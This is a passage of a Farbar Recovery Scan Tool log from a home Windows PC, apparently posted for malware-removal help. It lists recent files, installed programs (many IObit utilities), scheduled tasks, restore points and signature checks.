2014-12-10 11:28 - 2014-11-21 20:07 - 00501248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-12-10 11:28 - 2014-11-21 20:07 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-12-10 11:28 - 2014-11-21 20:06 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-12-10 11:28 - 2014-11-21 20:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-12-10 11:28 - 2014-11-21 20:05 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-12-10 11:28 - 2014-11-21 20:01 - 02277888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-12-10 11:28 - 2014-11-21 19:59 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-12-10 11:28 - 2014-11-21 19:58 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-12-10 11:28 - 2014-11-21 19:56 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-12-10 11:28 - 2014-11-21 19:54 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-12-10 11:28 - 2014-11-21 19:49 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-12-10 11:28 - 2014-11-21 19:49 - 00718848 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-12-10 11:28 - 2014-11-21 19:47 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-12-10 11:28 - 2014-11-21 19:46 - 02125312 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-12-10 11:28 - 2014-11-21 19:45 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-12-10 11:28 - 2014-11-21 19:43 - 14412800 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-12-10 11:28 - 2014-11-21 19:40 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-12-10 11:28 - 2014-11-21 19:36 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-12-10 11:28 - 2014-11-21 19:35 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-12-10 11:28 - 2014-11-21 19:33 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-12-10 11:28 - 2014-11-21 19:29 - 04299264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-12-10 11:28 - 2014-11-21 19:28 - 02358272 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-12-10 11:28 - 2014-11-21 19:23 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-12-10 11:28 - 2014-11-21 19:22 - 02052096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-12-10 11:28 - 2014-11-21 19:21 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-12-10 11:28 - 2014-11-21 19:15 - 01548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-12-10 11:28 - 2014-11-21 19:13 - 12836864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-12-10 11:28 - 2014-11-21 19:03 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-12-10 11:28 - 2014-11-21 19:00 - 01888256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-12-10 11:28 - 2014-11-21 18:56 - 01307136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-12-10 11:28 - 2014-11-21 18:54 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-12-10 11:28 - 2014-11-10 21:09 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-12-10 11:28 - 2014-11-10 20:44 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2014-12-10 11:28 - 2014-11-10 19:46 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2014-12-10 11:25 - 2014-11-07 21:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-12-10 11:25 - 2014-11-07 20:45 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-12-10 11:25 - 2014-10-29 20:03 - 00165888 _____ (Microsoft Corporation) C:\Windows\system32\charmap.exe
2014-12-10 11:25 - 2014-10-29 19:45 - 00155136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\charmap.exe
2014-12-10 11:25 - 2014-10-02 20:12 - 02020352 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2014-12-10 11:25 - 2014-10-02 20:12 - 00346624 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2014-12-10 11:25 - 2014-10-02 20:12 - 00310272 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2014-12-10 11:25 - 2014-10-02 20:12 - 00181248 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2014-12-10 11:25 - 2014-10-02 20:11 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2014-12-10 11:25 - 2014-10-02 19:45 - 01177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2014-12-10 11:25 - 2014-10-02 19:45 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2014-12-10 11:25 - 2014-10-02 19:45 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2014-12-10 11:25 - 2014-10-02 19:45 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2014-12-10 11:25 - 2014-10-02 19:44 - 00198656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2014-12-09 22:56 - 2014-12-09 22:56 - 03981488 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2014-12-09 22:06 - 2014-12-09 22:06 - 00001179 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-12-09 22:06 - 2014-12-09 22:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-12-09 22:04 - 2014-12-09 22:05 - 32809520 _____ (IObit ) C:\Users\John\Downloads\IObit-Malware-Fighter-Setup.exe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-05 13:06 - 2013-11-24 02:59 - 01961230 _____ () C:\Windows\WindowsUpdate.log
2015-01-05 13:03 - 2014-01-13 15:32 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2015-01-05 12:56 - 2013-11-24 01:09 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-01-05 12:20 - 2014-01-15 20:28 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-01-05 11:52 - 2013-11-24 01:27 - 00000000 ____D () C:\Program Files (x86)\Dell Backup and Recovery
2015-01-05 11:52 - 2009-07-13 22:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-05 11:52 - 2009-07-13 22:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-05 11:44 - 2014-01-15 20:28 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-01-05 11:44 - 2009-07-13 23:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-05 11:39 - 2014-01-15 20:28 - 00000000 ____D () C:\Program Files (x86)\Google
2015-01-05 10:49 - 2014-04-23 22:04 - 00002852 _____ () C:\Windows\System32\Tasks\Driver Booster SkipUAC (John)
2015-01-02 11:08 - 2014-01-13 16:39 - 00000000 ____D () C:\ProgramData\ProductData
2015-01-02 11:08 - 2014-01-13 16:37 - 00000000 ____D () C:\Users\John\AppData\Roaming\IObit
2015-01-02 11:07 - 2014-01-13 16:35 - 00000000 ____D () C:\ProgramData\IObit
2015-01-02 11:06 - 2014-01-13 16:35 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-12-26 23:51 - 2014-09-22 14:03 - 00000000 ____D () C:\Windows\Minidump
2014-12-26 12:41 - 2014-01-13 15:41 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-12-26 11:28 - 2011-02-10 08:02 - 00000000 ____D () C:\Windows\panther
2014-12-26 11:11 - 2013-11-24 01:33 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-12-26 11:04 - 2014-05-17 17:40 - 31215616 _____ () C:\Windows\system32\config\components.iodefrag.bak
2014-12-26 11:04 - 2014-04-24 09:03 - 74121216 _____ () C:\Windows\system32\config\SOFTWARE.iodefrag.bak
2014-12-26 11:04 - 2014-04-24 09:03 - 00323584 _____ () C:\Windows\system32\config\DEFAULT.iodefrag.bak
2014-12-26 11:04 - 2014-04-24 09:03 - 00061440 _____ () C:\Windows\system32\config\SAM.iodefrag.bak
2014-12-26 11:04 - 2014-04-24 09:03 - 00024576 _____ () C:\Windows\system32\config\SECURITY.iodefrag.bak
2014-12-26 11:04 - 2014-01-13 15:25 - 00000000 ____D () C:\Users\John
2014-12-26 11:02 - 2013-11-24 01:09 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-12-26 11:02 - 2013-11-24 01:09 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-12-26 11:02 - 2013-11-24 01:09 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-12-26 11:01 - 2009-07-13 23:13 - 00783606 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-12-26 10:59 - 2013-11-24 02:27 - 00107552 _____ (Realtek Semiconductor Corporation) C:\Windows\system32\RTNUninst64.dll
2014-12-26 10:58 - 2014-01-13 15:34 - 00000000 ____D () C:\Users\John\Documents\Bluetooth Folder
2014-12-26 10:53 - 2014-04-23 22:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Smart Defrag 3
2014-12-19 13:10 - 2014-01-13 15:58 - 00000000 ____D () C:\Users\John\AppData\Roaming\Mozilla
2014-12-17 20:11 - 2009-07-13 23:32 - 00000000 ____D () C:\Windows\Offline Web Pages
2014-12-17 20:10 - 2014-02-09 22:33 - 00000000 ____D () C:\Users\John\AppData\Roaming\systweak
2014-12-16 16:03 - 2014-01-13 16:48 - 00000000 ____D () C:\Users\John\AppData\Roaming\Skype
2014-12-16 16:03 - 2013-11-24 01:22 - 00000000 ____D () C:\ProgramData\Skype
2014-12-16 12:12 - 2014-01-15 21:13 - 00000000 ____D () C:\Users\John\AppData\Local\CrashDumps
2014-12-16 11:52 - 2014-01-13 15:32 - 00000000 ____D () C:\Users\John\AppData\Local\VirtualStore
2014-12-14 03:23 - 2013-11-24 01:22 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-12-11 03:22 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-12-11 03:07 - 2014-01-19 21:27 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-12-11 03:06 - 2014-01-17 17:34 - 00000000 ____D () C:\Windows\system32\MRT
2014-12-11 03:03 - 2014-01-17 17:34 - 112710672 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-27 15:25

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 04-01-2015
Ran by John at 2015-01-05 13:14:43
Running from C:\Users\John\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: IObit Malware Fighter (Enabled - Up to date) {A751AC20-3B48-5237-898A-78C4436BB78D}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Accidental Damage Services Agreement (HKLM-x32\...\{EF85FEF4-EB92-4075-A6D2-5F519BB30A2C}) (Version: 2.0.0 - Dell Inc.)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 15.0.0.356 - Adobe Systems Incorporated)
Adobe Flash Player 16 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 16.0.0.235 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.235 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10)  MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM-x32\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
Advanced SystemCare 8 (HKLM-x32\...\Advanced SystemCare 8_is1) (Version: 8.0.3 - IObit)
Banctec Service Agreement (HKLM-x32\...\{42D68A86-DB1C-4256-B8C9-5D0D92919AF5}) (Version: 2.0.0 - Dell Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Complete Care Business Service Agreement (HKLM-x32\...\{0ECFCB07-9BFE-4970-ACA1-D568D982760B}) (Version: 2.0.0 - Dell Inc.)
Consumer In-Home Service Agreement (HKLM-x32\...\{F47C37A4-7189-430A-B81D-739FF8A7A554}) (Version: 2.0.0 - Dell Inc.)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.1.3) (Version: 5.0.1.3 - Coupons.com Incorporated)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 1.5.0.0 - Dell Inc.)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.5.0.0 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{BC8233D8-59BA-4D40-92B9-4FDE7452AA8B}) (Version: 3.0.3999.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Home Systems Service Agreement (HKLM-x32\...\{AB2FDE4F-6BED-4E9E-B676-3DCCEBB1FBFE}) (Version: 2.0.0 - Dell Inc.)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 17.0.8.1 - Synaptics Incorporated)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
DIRECTV Player (HKLM-x32\...\{437f5443-c052-432c-b1e7-abd9bc5cabdb}) (Version: 11.0 - DIRECTV)
Driver Booster 2 (HKLM-x32\...\Driver Booster_is1) (Version: 2.0 - IObit)
DSC/AA Factory Installer (Version: 3.4.6299.48 - PC-Doctor, Inc.) Hidden
eBay (HKLM-x32\...\{A8B88634-7F90-402F-B66A-86429755F6A5}) (Version: 1.4.0 - eBay Inc.)
Epson Event Manager (HKLM-x32\...\{48F22622-1CC2-4A83-9C1E-644DD96F832D}) (Version: 2.30.01 - SEIKO EPSON Corporation)
EPSON NX510 Series Printer Uninstall (HKLM\...\EPSON NX510 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - )
EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.6.0 - SEIKO EPSON CORPORATION)
EpsonNet Setup (HKLM-x32\...\{FFFAE01B-466F-4C07-9821-A94FD753BDDA}) (Version: 3.1c - SEIKO EPSON CORPORATION)
FUJIFILM MyFinePix Studio 3.2 (HKLM-x32\...\MyFinePix Studio_is1) (Version:  - )
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google+ Auto Backup (HKLM-x32\...\{A50DE037-B5C0-4C8A-8049-B0C576B313D1}) (Version: 1.0.21.81 - Google)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.3.1520 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.18.10.3234 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.7.1.1000 - Intel Corporation)
IObit Apps Toolbar v10.5 (HKLM-x32\...\{9C2D4436-24B7-4123-BFC4-673B83A9CE33}) (Version: 10.5 - Spigot, Inc.) <==== ATTENTION
IObit Malware Fighter (HKLM-x32\...\IObit Malware Fighter_is1) (Version: 2.5 - IObit)
IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 4.1.5.33 - IObit)
Junk Mail filter update (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Access database engine 2010 (English) (HKLM-x32\...\{90140000-00D1-0409-0000-0000000FF1CE}) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4454.1510 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Streets & Trips 2013 (HKLM-x32\...\{C82185E8-C27B-4EF4-2013-4444BC2C2B6D}) (Version: 19.0.17.2200 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 34.0.5 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 34.0.5 (x86 en-US)) (Version: 34.0.5 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 34.0.5 - Mozilla)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Premium Service Agreement (HKLM-x32\...\{C33AA6D6-F5EC-48F3-AFDC-8141345D473A}) (Version: 2.0.0 - Dell Inc.)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.230 - Qualcomm Atheros Communications)
QualxServ Service Agreement (HKLM-x32\...\{903679E8-44C8-4C07-9600-05C92654FC50}) (Version: 2.0.0 - Dell Inc.)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 10.16.002 - Dell Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7246 - Realtek Semiconductor Corp.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Smart Defrag 3 (HKLM-x32\...\Smart Defrag 3_is1) (Version: 3.3 - IObit)
Sudoku Puzzle Addict (HKLM-x32\...\{C03E8D2E-3526-4C5D-9744-86FBBC098C43}) (Version: 1.00.0000 - GSP)
Surfing Protection (HKLM-x32\...\IObit Surfing Protection_is1) (Version: 1.2 - IObit)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Warcraft II BNE (HKLM-x32\...\Warcraft II BNE) (Version:  - )
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\John\AppData\Local\DIRECTV Player\win64\npPlayerPlugin64.dll (Cisco)

==================== Restore Points  =========================

17-12-2014 19:47:02 IObit Uninstaller restore point
18-12-2014 10:00:37 Windows Update
20-12-2014 03:00:15 Windows Update
24-12-2014 17:57:45 Windows Update
26-12-2014 10:57:46 Driver Booster : Adobe AIR
26-12-2014 12:09:04 AA11
26-12-2014 12:12:41 LavasoftWeCompanion
26-12-2014 12:27:15 AA11
26-12-2014 12:40:10 IObit Uninstaller restore point
26-12-2014 19:17:08 IObit Uninstaller restore point
26-12-2014 22:58:15 IObit Uninstaller restore point
26-12-2014 22:58:47 AA11
26-12-2014 23:03:01 IObit Uninstaller restore point
26-12-2014 23:03:22 LavasoftWeCompanion
29-12-2014 17:03:56 IObit Uninstaller restore point
29-12-2014 17:06:54 IObit Uninstaller restore point
31-12-2014 09:56:29 Windows Update
05-01-2015 11:39:37 IObit Uninstaller restore point
05-01-2015 11:42:00 IObit Uninstaller restore point

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 20:34 - 2009-06-10 15:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {07A2F53B-4786-4062-A24F-C16B7B8626FE} - \Digital Sites No Task File <==== ATTENTION
Task: {0D874672-9B6F-4886-9F60-E8BE77F6DA3C} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-31] (PC-Doctor, Inc.)
Task: {15BF610A-6047-49D5-93A5-4DEBE157F84D} - System32\Tasks\Driver Booster SkipUAC (SYSTEM) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe [2014-10-28] (IObit)
Task: {16C08E06-9BC7-40BB-BF3A-30A994E715F2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-15] (Google Inc.)
Task: {2042D263-2E5C-484E-814A-3C29EF2D579F} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {3A7353BA-F60D-4F60-B727-9373518B5F94} - System32\Tasks\PCDoctorBackgroundMonitorTask-Retry => C:\Program Files\My Dell\uaclauncher.exe [2014-01-31] (PC-Doctor, Inc.)
Task: {4164D968-2170-4D8B-A90C-CF156F6E67C5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-15] (Google Inc.)
Task: {6363D9C5-CDFA-45D6-9C63-B518B08A28BC} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-31] (PC-Doctor, Inc.)
Task: {73F1ECDA-E878-4546-961F-1A64753EA16E} - System32\Tasks\SmartDefrag3_Startup => C:\Program Files (x86)\IObit\Smart Defrag 3\SmartDefrag.exe [2014-11-04] (IObit)
Task: {890EE660-61F4-4441-A4B3-66BE385978EB} - System32\Tasks\ASC8_SkipUac_John => C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASC.exe [2014-12-10] (IObit)
Task: {BA55BC07-9D8B-4B05-84F9-3DEA9F26C048} - System32\Tasks\Driver Booster SkipUAC (John) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe [2014-10-28] (IObit)
Task: {C190163D-888F-4F09-BEA5-EB4E6D0D0C36} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe [2014-10-13] (IObit)
Task: {CAE18874-F60E-4A7F-851F-69D0DD6D6E70} - System32\Tasks\Uninstaller_SkipUac_Administrator => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2015-01-02] (IObit)
Task: {CE90F2B6-3A0E-48C7-9779-C70824FB3438} - System32\Tasks\SmartDefrag3_Update => C:\Program Files (x86)\IObit\Smart Defrag 3\AutoUpdate.exe [2014-07-23] (IObit)
Task: {E413B16F-DDDF-4E61-8738-12A8E92C53CC} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-12-26] (Adobe Systems Incorporated)
Task: {F28CB2D1-C20D-4E37-8E15-10F216172851} - System32\Tasks\Uninstaller_SkipUac_John => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2015-01-02] (IObit)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2013-06-28 12:12 - 2013-06-28 12:12 - 00034304 _____ () C:\Windows\System32\ssj1mlm.dll
2013-11-24 01:27 - 2013-04-19 15:51 - 00020256 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIcon.dll
2013-11-24 01:27 - 2013-04-19 15:52 - 00049440 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\STCommonShellIntegration.dll
2013-11-24 01:27 - 2013-04-19 15:51 - 00019232 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayNotBackuped.dll
2013-07-02 22:51 - 2013-07-02 22:51 - 00086016 _____ () C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Modules\Map\MAP.dll
2013-11-24 01:27 - 2013-04-19 15:51 - 00023328 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe
